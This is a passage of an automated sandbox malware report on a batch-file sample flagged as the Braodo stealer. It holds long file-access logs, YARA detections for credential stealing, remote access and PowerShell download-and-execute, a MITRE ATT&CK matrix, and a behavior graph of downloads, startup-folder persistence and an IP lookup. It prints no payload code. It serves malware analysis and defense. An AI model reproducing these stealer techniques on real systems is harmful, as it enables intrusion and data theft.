          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\functools.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\functools.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\functools.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\functools.cpython-310.pyc.1784793920816 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\collections\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\collections\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\collections\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\collections\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\collections\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\collections\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\collections\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\collections\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\collections\__pycache__\__init__.cpython-310.pyc.1784788837680 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\keyword.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\keyword.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\keyword.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\keyword.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\keyword.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\keyword.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\keyword.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\keyword.cpython-310.pyc.1784794168880 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\operator.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\operator.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\operator.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\operator.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\operator.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\operator.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\operator.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\operator.cpython-310.pyc.1784794168880 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\reprlib.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\reprlib.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\reprlib.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\reprlib.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\reprlib.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\reprlib.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\reprlib.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\reprlib.cpython-310.pyc.1784794168880 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\copyreg.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\copyreg.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\copyreg.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\copyreg.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\copyreg.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\copyreg.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\copyreg.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\copyreg.cpython-310.pyc.1784794158256 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\base64.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\base64.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\base64.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\base64.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\base64.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\base64.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\base64.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\base64.cpython-310.pyc.1784799020400 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\struct.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\struct.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\struct.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\struct.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\struct.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\struct.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\struct.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\struct.cpython-310.pyc.1784799031712 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\pickle.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\pickle.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\pickle.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\pickle.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\pickle.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\pickle.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\pickle.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\pickle.cpython-310.pyc.1784817049184 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\_compat_pickle.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\_compat_pickle.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\_compat_pickle.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\_compat_pickle.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\_compat_pickle.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\_compat_pickle.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\_compat_pickle.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\_compat_pickle.cpython-310.pyc.1784799998512 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\DLLs | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\pythonwin | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\ast.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\ast.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\ast.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\ast.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\ast.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\ast.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\ast.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\ast.cpython-310.pyc.1784817055232 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\contextlib.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\contextlib.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\contextlib.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\contextlib.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\contextlib.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\contextlib.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\contextlib.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\contextlib.cpython-310.pyc.1784794160432 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\DLLs | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__init__.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__init__.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__pycache__\__init__.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__pycache__\__init__.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__init__.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__init__.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__init__.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__pycache__\__init__.cpython-310.pyc.1784825455520 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__init__.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__init__.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__init__.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__init__.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__init__.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__ | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-310.pyc.1784825455664 | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\_mode_ecb.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\_mode_ecb.py | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-310.pyc | VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7052, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7052, type: MEMORYSTR
          MITRE ATT&CK Matrix (counts before a technique name are the number of matching signatures; cells without a count are the matrix template's placeholders)

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | 21 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 21 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 2 PowerShell | 2 Registry Run Keys / Startup Folder | 2 Registry Run Keys / Startup Folder | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph (graph rendered as text; node numbers in parentheses are the graph's node IDs, trailing numbers after a process name are the per-process counters shown in the legend)

          Behavior Graph ID: 1640885 | Sample: T3-03-17.bat | Startdate: 17/03/2025 | Architecture: WINDOWS | Score: 100

          Start (2)
            DNS/IP: www.dropbox.com; www-env.dropbox-dns.com; 5 other IPs or domains
            Signatures: Suricata IDS alerts for network traffic; Yara detected Braodo; Yara detected Powershell download and execute; 7 other signatures
            Started: cmd.exe (9) 1; cmd.exe (12) 1

          cmd.exe (9)
            Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
            Started: powershell.exe (14) 14 1006; conhost.exe (19)

          cmd.exe (12)
            Started: powershell.exe (21) 12; conhost.exe (23)

          powershell.exe (14)
            DNS/IP: github.com 140.82.121.3, 443, 49721 GITHUBUS United States; raw.githubusercontent.com 185.199.108.133, 443, 49722 FASTLYUS Netherlands; 2 other IPs or domains
            Dropped: C:\Users\Public\Document\vcruntime140_1.dll, PE32+; C:\Users\Public\Document\vcruntime140.dll, PE32+; C:\Users\Public\Document\python310.dll, PE32+; 597 other files (42 malicious)
            Signatures: Drops script or batch files to the startup folder; Powershell drops PE file
            Started: python.exe (25) 382; conhost.exe (28)

          powershell.exe (21)
            Started: conhost.exe (30)

          python.exe (25)
            DNS/IP: ipinfo.io 34.117.59.81 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States
            Started: cmd.exe (32); cmd.exe (34)

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.